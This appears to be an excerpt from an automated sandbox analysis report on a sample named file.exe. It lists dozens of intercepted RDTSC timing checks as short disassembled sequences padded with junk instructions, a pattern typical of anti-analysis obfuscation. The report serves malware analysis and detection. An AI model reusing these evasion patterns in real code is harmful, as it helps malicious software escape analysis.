            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0761 second address: 49C0792 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 mov cx, F5F5h 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push edi 0x0000000d mov dx, ax 0x00000010 pop ecx 0x00000011 popad 0x00000012 nop 0x00000013 jmp 00007FE9F881B0C2h 0x00000018 push dword ptr [ebp+08h] 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e movsx edx, ax 0x00000021 mov edi, eax 0x00000023 popad 0x00000024 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0792 second address: 49C0798 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C07EC second address: 49C07F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C07F2 second address: 49C07F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C07F6 second address: 49C07FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0842 second address: 49C0876 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9F8B69BA8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, esi 0x0000000b pushad 0x0000000c mov ax, D25Dh 0x00000010 mov ebx, eax 0x00000012 popad 0x00000013 pop esi 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FE9F8B69B9Bh 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0876 second address: 49C0893 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, dx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movzx eax, bx 0x00000010 call 00007FE9F881B0BBh 0x00000015 pop eax 0x00000016 popad 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0893 second address: 49C0899 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0899 second address: 49C089D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C089D second address: 49C001B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 retn 0004h 0x0000000b nop 0x0000000c sub esp, 04h 0x0000000f xor ebx, ebx 0x00000011 cmp eax, 00000000h 0x00000014 je 00007FE9F8B69CE5h 0x0000001a xor eax, eax 0x0000001c mov dword ptr [esp], 00000000h 0x00000023 mov dword ptr [esp+04h], 00000000h 0x0000002b call 00007FE9FD4C56EBh 0x00000030 mov edi, edi 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007FE9F8B69BA7h 0x00000039 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C001B second address: 49C0059 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9F881B0C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FE9F881B0BEh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FE9F881B0BDh 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0059 second address: 49C006E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9F8B69BA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C006E second address: 49C0074 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0074 second address: 49C0078 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0078 second address: 49C007C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C007C second address: 49C0136 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FE9F8B69B9Fh 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 pushad 0x00000012 mov ah, 78h 0x00000014 pushfd 0x00000015 jmp 00007FE9F8B69BA7h 0x0000001a add ecx, 56AEA79Eh 0x00000020 jmp 00007FE9F8B69BA9h 0x00000025 popfd 0x00000026 popad 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007FE9F8B69B9Eh 0x0000002e and ax, 5198h 0x00000033 jmp 00007FE9F8B69B9Bh 0x00000038 popfd 0x00000039 pushfd 0x0000003a jmp 00007FE9F8B69BA8h 0x0000003f jmp 00007FE9F8B69BA5h 0x00000044 popfd 0x00000045 popad 0x00000046 popad 0x00000047 push FFFFFFFEh 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007FE9F8B69B9Dh 0x00000050 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0136 second address: 49C016D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9F881B0C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 0727A327h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FE9F881B0C9h 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C016D second address: 49C0171 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0171 second address: 49C0177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0177 second address: 49C0198 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9F8B69B9Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 6E82FB21h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov edx, 09563530h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0198 second address: 49C019D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C019D second address: 49C01A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C01A3 second address: 49C01C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9F881B0BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push 565C3495h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C01C1 second address: 49C01C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ch, 14h 0x00000006 popad 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C01C8 second address: 49C01DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE9F881B0C1h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C01DD second address: 49C01E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C01E1 second address: 49C0262 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 1F48F6DBh 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FE9F881B0C3h 0x00000016 adc ecx, 0D99129Eh 0x0000001c jmp 00007FE9F881B0C9h 0x00000021 popfd 0x00000022 movzx eax, bx 0x00000025 popad 0x00000026 mov eax, dword ptr fs:[00000000h] 0x0000002c jmp 00007FE9F881B0C3h 0x00000031 nop 0x00000032 pushad 0x00000033 mov eax, 15E4DC6Bh 0x00000038 mov bh, ch 0x0000003a popad 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f jmp 00007FE9F881B0BFh 0x00000044 mov ah, BCh 0x00000046 popad 0x00000047 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0262 second address: 49C0293 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9F8B69BA2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007FE9F8B69BA0h 0x0000000f sub esp, 18h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 mov cx, 35A3h 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0293 second address: 49C02B3 instructions: 0x00000000 rdtsc 0x00000002 mov ah, 88h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push esi 0x00000008 jmp 00007FE9F881B0BCh 0x0000000d mov dword ptr [esp], ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov dx, FF00h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C02B3 second address: 49C02B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C02B8 second address: 49C0372 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edi 0x00000005 pushfd 0x00000006 jmp 00007FE9F881B0BEh 0x0000000b sbb si, CD48h 0x00000010 jmp 00007FE9F881B0BBh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, esi 0x0000001a pushad 0x0000001b jmp 00007FE9F881B0C4h 0x00000020 pushad 0x00000021 mov cx, 19A7h 0x00000025 pushfd 0x00000026 jmp 00007FE9F881B0BCh 0x0000002b or ax, 32D8h 0x00000030 jmp 00007FE9F881B0BBh 0x00000035 popfd 0x00000036 popad 0x00000037 popad 0x00000038 push eax 0x00000039 jmp 00007FE9F881B0C9h 0x0000003e xchg eax, esi 0x0000003f pushad 0x00000040 movzx esi, bx 0x00000043 popad 0x00000044 xchg eax, edi 0x00000045 jmp 00007FE9F881B0C2h 0x0000004a push eax 0x0000004b jmp 00007FE9F881B0BBh 0x00000050 xchg eax, edi 0x00000051 pushad 0x00000052 mov di, si 0x00000055 popad 0x00000056 mov eax, dword ptr [75AB4538h] 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e mov edi, 604A3C6Ah 0x00000063 mov di, B536h 0x00000067 popad 0x00000068 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0372 second address: 49C0385 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop ebx 0x00000005 mov bl, ah 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [ebp-08h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0385 second address: 49C039F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9F881B0C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C039F second address: 49C0412 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE9F8B69BA1h 0x00000008 mov ecx, 45FB07F7h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xor eax, ebp 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FE9F8B69BA9h 0x00000019 or ecx, 43933956h 0x0000001f jmp 00007FE9F8B69BA1h 0x00000024 popfd 0x00000025 mov si, DAC7h 0x00000029 popad 0x0000002a nop 0x0000002b jmp 00007FE9F8B69B9Ah 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007FE9F8B69B9Dh 0x0000003a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0412 second address: 49C0416 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0416 second address: 49C041C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C041C second address: 49C0431 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 87F9h 0x00000007 mov cx, AAB5h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0431 second address: 49C0435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0435 second address: 49C0439 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0439 second address: 49C043F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C043F second address: 49C0490 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, B9B4h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a lea eax, dword ptr [ebp-10h] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FE9F881B0C4h 0x00000016 xor eax, 4A13F768h 0x0000001c jmp 00007FE9F881B0BBh 0x00000021 popfd 0x00000022 call 00007FE9F881B0C8h 0x00000027 pop esi 0x00000028 popad 0x00000029 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0490 second address: 49C052B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9F8B69BA0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr fs:[00000000h], eax 0x0000000f pushad 0x00000010 call 00007FE9F8B69B9Eh 0x00000015 movzx esi, dx 0x00000018 pop edx 0x00000019 call 00007FE9F8B69B9Ch 0x0000001e pushfd 0x0000001f jmp 00007FE9F8B69BA2h 0x00000024 sbb ah, FFFFFF88h 0x00000027 jmp 00007FE9F8B69B9Bh 0x0000002c popfd 0x0000002d pop eax 0x0000002e popad 0x0000002f mov dword ptr [ebp-18h], esp 0x00000032 jmp 00007FE9F8B69B9Fh 0x00000037 mov eax, dword ptr fs:[00000018h] 0x0000003d jmp 00007FE9F8B69BA6h 0x00000042 mov ecx, dword ptr [eax+00000FDCh] 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b mov di, 0E30h 0x0000004f mov esi, edi 0x00000051 popad 0x00000052 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C052B second address: 49C0540 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE9F881B0C1h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0540 second address: 49C05A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9F8B69BA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test ecx, ecx 0x0000000d jmp 00007FE9F8B69B9Eh 0x00000012 jns 00007FE9F8B69BDAh 0x00000018 jmp 00007FE9F8B69BA0h 0x0000001d add eax, ecx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007FE9F8B69B9Dh 0x00000028 sbb cl, 00000076h 0x0000002b jmp 00007FE9F8B69BA1h 0x00000030 popfd 0x00000031 mov dx, si 0x00000034 popad 0x00000035 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C05A9 second address: 49C05E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, bl 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c jmp 00007FE9F881B0C7h 0x00000011 mov ax, B23Fh 0x00000015 popad 0x00000016 test ecx, ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FE9F881B0C1h 0x0000001f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B022E second address: 49B0243 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9F8B69BA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0243 second address: 49B0249 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0249 second address: 49B024D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B024D second address: 49B02DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov dx, 2178h 0x0000000e pushfd 0x0000000f jmp 00007FE9F881B0C1h 0x00000014 jmp 00007FE9F881B0BBh 0x00000019 popfd 0x0000001a popad 0x0000001b mov ebp, esp 0x0000001d jmp 00007FE9F881B0C6h 0x00000022 sub esp, 2Ch 0x00000025 jmp 00007FE9F881B0C0h 0x0000002a xchg eax, ebx 0x0000002b pushad 0x0000002c push eax 0x0000002d mov dl, 64h 0x0000002f pop ecx 0x00000030 pushad 0x00000031 pushfd 0x00000032 jmp 00007FE9F881B0C1h 0x00000037 sub cx, C4D6h 0x0000003c jmp 00007FE9F881B0C1h 0x00000041 popfd 0x00000042 popad 0x00000043 popad 0x00000044 push eax 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 mov bx, BFE0h 0x0000004c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B02DF second address: 49B0340 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FE9F8B69BA9h 0x00000008 and eax, 22F2C8E6h 0x0000000e jmp 00007FE9F8B69BA1h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 jmp 00007FE9F8B69BA0h 0x0000001b popad 0x0000001c xchg eax, ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FE9F8B69BA7h 0x00000024 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0340 second address: 49B036D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9F881B0C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE9F881B0BDh 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B03CE second address: 49B0498 instructions: 0x00000000 rdtsc 0x00000002 mov bh, 1Eh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 sub ebx, ebx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FE9F8B69BA9h 0x00000010 xor ecx, 372E0FD6h 0x00000016 jmp 00007FE9F8B69BA1h 0x0000001b popfd 0x0000001c mov edx, ecx 0x0000001e popad 0x0000001f sub edi, edi 0x00000021 jmp 00007FE9F8B69BA3h 0x00000026 inc ebx 0x00000027 jmp 00007FE9F8B69BA6h 0x0000002c test al, al 0x0000002e pushad 0x0000002f movzx eax, dx 0x00000032 mov bx, 4E6Eh 0x00000036 popad 0x00000037 je 00007FE9F8B69D6Dh 0x0000003d pushad 0x0000003e push edi 0x0000003f call 00007FE9F8B69B9Eh 0x00000044 pop esi 0x00000045 pop ebx 0x00000046 mov ax, D3F7h 0x0000004a popad 0x0000004b lea ecx, dword ptr [ebp-14h] 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 pushfd 0x00000052 jmp 00007FE9F8B69B9Fh 0x00000057 adc esi, 6477947Eh 0x0000005d jmp 00007FE9F8B69BA9h 0x00000062 popfd 0x00000063 popad 0x00000064 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0498 second address: 49B04B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE9F881B0C8h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B04F1 second address: 49B0500 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9F8B69B9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0500 second address: 49B0506 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0506 second address: 49B050A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0572 second address: 49B058F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9F881B0C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B058F second address: 49B05D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE9F8B69BA7h 0x00000009 sub ch, 0000007Eh 0x0000000c jmp 00007FE9F8B69BA9h 0x00000011 popfd 0x00000012 mov bx, ax 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 jg 00007FEA69C17A55h 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 pop edi 0x00000023 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B05D8 second address: 49B0666 instructions: 0x00000000 rdtsc 0x00000002 mov bx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dh, al 0x00000009 popad 0x0000000a js 00007FE9F881B0EFh 0x00000010 jmp 00007FE9F881B0C9h 0x00000015 cmp dword ptr [ebp-14h], edi 0x00000018 pushad 0x00000019 movzx eax, di 0x0000001c mov bh, A2h 0x0000001e popad 0x0000001f jne 00007FEA698C8F46h 0x00000025 jmp 00007FE9F881B0C0h 0x0000002a mov ebx, dword ptr [ebp+08h] 0x0000002d pushad 0x0000002e mov ax, 674Dh 0x00000032 call 00007FE9F881B0BAh 0x00000037 mov si, FA81h 0x0000003b pop ecx 0x0000003c popad 0x0000003d lea eax, dword ptr [ebp-2Ch] 0x00000040 jmp 00007FE9F881B0BDh 0x00000045 xchg eax, esi 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007FE9F881B0C8h 0x0000004f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0666 second address: 49B066A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B066A second address: 49B0670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0670 second address: 49B068E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, ecx 0x00000005 mov ch, F5h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE9F8B69BA1h 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B068E second address: 49B0694 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0694 second address: 49B06EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9F8B69BA3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FE9F8B69B9Bh 0x00000015 sbb ecx, 5124F1CEh 0x0000001b jmp 00007FE9F8B69BA9h 0x00000020 popfd 0x00000021 call 00007FE9F8B69BA0h 0x00000026 pop esi 0x00000027 popad 0x00000028 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B078E second address: 49B07C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, bh 0x00000005 pushfd 0x00000006 jmp 00007FE9F881B0C0h 0x0000000b sbb esi, 02BF0E28h 0x00000011 jmp 00007FE9F881B0BBh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov esi, eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B07C1 second address: 49B07C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B07C5 second address: 49B07CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B07CB second address: 49B07D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, 860Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
